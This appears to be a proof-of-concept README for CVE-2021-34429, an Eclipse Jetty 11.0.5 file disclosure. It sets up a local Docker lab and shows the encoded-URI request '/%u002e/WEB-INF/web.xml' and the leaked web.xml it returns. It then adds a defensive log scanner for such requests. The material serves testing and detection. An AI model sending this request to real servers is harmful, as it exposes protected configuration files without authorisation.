ColdFusionX/CVE-2021-34429

CVE-2021-34429

POC for CVE-2021-34429 - Eclipse Jetty 11.0.5 Sensitive File Disclosure

Using Encoded URIs to access files inside WEB-INF directory

Setting up the testing Environment

Prerequisites: install Docker and docker-compose on your system

For Debian-based distros (e.g. Ubuntu, Kali Linux), use the following commands:

apt install docker.io
apt install docker-compose

For Windows, macOS and other distros, please refer to the following guides:

Installing Eclipse Jetty 11.0.5

  • Clone or download the repository
  • Run docker-compose up -d
  • Your webserver should be up & running on http://localhost:8080/

Vulnerability Test

Make a GET request to http://localhost:8080/%u002e/WEB-INF/web.xml

  • curl -v 'localhost:8080/%u002e/WEB-INF/web.xml'

Request

GET /%u002e/WEB-INF/web.xml HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Wed, 03 Nov 2021 08:25:24 GMT
Content-Type: application/xml
Accept-Ranges: bytes
Content-Length: 209
Server: Jetty(11.0.5)

<!DOCTYPE web-app PUBLIC
 "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
 "http://java.sun.com/dtd/web-app_2_3.dtd" >

<web-app>
<display-name>ColdFusionX - Web Application</display-name>
</web-app>
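
For defenders, the request above can be spotted in access logs by decoding the path the way the server did and checking whether it lands inside WEB-INF. The following is an added example, not part of the original repository; it generalises from %u002e to any %uXXXX or %XX escape, and it assumes the access log is in NCSA/combined format and records the raw request target. The log lines are constructed sample data.

```python
import posixpath
import re
from urllib.parse import unquote

PCT_U = re.compile(r"%u([0-9a-fA-F]{4})")  # non-standard %uXXXX escape
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def canonical_path(target):
    """Decode %uXXXX and %XX escapes, then collapse "." and ".." segments."""
    path = target.split("?", 1)[0]
    path = PCT_U.sub(lambda m: chr(int(m.group(1), 16)), path)
    path = unquote(path)
    return posixpath.normpath("/" + path.lstrip("/"))

def classify(target):
    """Return 'literal' or 'obfuscated' if the target resolves into WEB-INF, else None."""
    raw_path = target.split("?", 1)[0]
    canon = canonical_path(target)
    # Match a whole path segment so /docs/web-info.html is not flagged,
    # and so deployments under a context path (/app/WEB-INF/...) are.
    if "web-inf" not in canon.lower().split("/"):
        return None
    # Obfuscated: WEB-INF is only reached after decoding or normalisation.
    return "literal" if canon == raw_path else "obfuscated"

def scan(lines):
    """Return (target, status, kind) for every log line that resolves into WEB-INF."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if m is None:
            continue
        kind = classify(m["target"])
        if kind:
            findings.append((m["target"], int(m["status"]), kind))
    return findings

# Constructed sample log lines (not captured from a real server).
SAMPLE_LOG = [
    '127.0.0.1 - - [03/Nov/2021:08:30:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '127.0.0.1 - - [03/Nov/2021:08:30:05 +0000] "GET /WEB-INF/web.xml HTTP/1.1" 404 0',
    '127.0.0.1 - - [03/Nov/2021:08:30:09 +0000] "GET /%u002e/WEB-INF/web.xml HTTP/1.1" 200 209',
    '127.0.0.1 - - [03/Nov/2021:08:30:12 +0000] "GET /docs/web-info.html HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for target, status, kind in scan(SAMPLE_LOG):
        print(f"{kind:10} status={status} {target}")
```

An "obfuscated" hit with a 200 status is the case that matters: the server served a file from WEB-INF.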
